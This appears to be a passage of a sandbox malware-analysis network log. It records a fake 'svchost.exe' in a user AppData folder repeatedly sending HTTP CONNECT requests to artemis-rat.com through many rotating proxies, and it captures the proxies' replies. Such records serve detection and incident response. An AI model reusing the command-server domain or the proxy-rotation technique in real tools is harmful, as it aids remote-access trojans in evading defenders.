                                                                                    3511192.168.2.560999119.3.215.41888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.909985065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3512192.168.2.560815222.138.76.6900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.910621881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3513192.168.2.557433193.30.13.1399943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.918766975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3514192.168.2.55727451.15.142.41637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.934386969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3515192.168.2.56109118.135.133.1168043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939485073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.307246923 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:37.456065893 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac fb 8c 99 da 7b 3a 5b e6 55 82 dd 49 fc 59 01 27 e8 35 1a 36 04 b6 5a 93 d5 56 f3 8c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR{:[UIY'56ZV*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:37.759254932 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e5 42 3d c5 ee 83 2f ad 1d 30 cf d4 5a e6 30 75 bb c6 a6 62 bd d7 d0 9f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9B=/0Z0ubDOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:37.759407043 CET536INData Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22
                                                                                    Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
                                                                                    Mar 9, 2024 13:14:37.759424925 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3516192.168.2.56106751.15.132.2151637943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939518929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3517192.168.2.56103446.17.63.166909143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939642906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3518192.168.2.56115143.153.22.291000543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939719915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.113203049 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:37.113607883 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3519192.168.2.56100162.171.131.1013744743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939800978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677349091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.880604982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3520192.168.2.56103334.95.243.122808143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.939843893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3521192.168.2.561181104.21.194.198043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.940175056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.094532967 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3522192.168.2.561035198.105.111.15669343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.940239906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.230370998 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3523192.168.2.557454198.57.211.2351109643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.945645094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474098921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3524192.168.2.561032101.133.162.23889943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.948544979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646099091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646693945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3525192.168.2.561215104.16.106.658043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.959602118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.113854885 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3526192.168.2.561068193.239.58.92808143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.959716082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3527192.168.2.561224104.25.230.2528043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.961838007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.115820885 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3528192.168.2.561234104.19.225.708043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.966211081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.120471954 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3529192.168.2.561235172.67.181.1368043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.966922998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.121201992 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3530192.168.2.561029171.250.222.13108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.971965075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3531192.168.2.561110128.140.26.128043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.972109079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3532192.168.2.561069185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.972470999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3533192.168.2.561063203.154.39.1468043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.984179020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.833338022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3534192.168.2.560899120.26.0.11888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.984693050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.329854965 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3535192.168.2.561257104.20.233.708043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
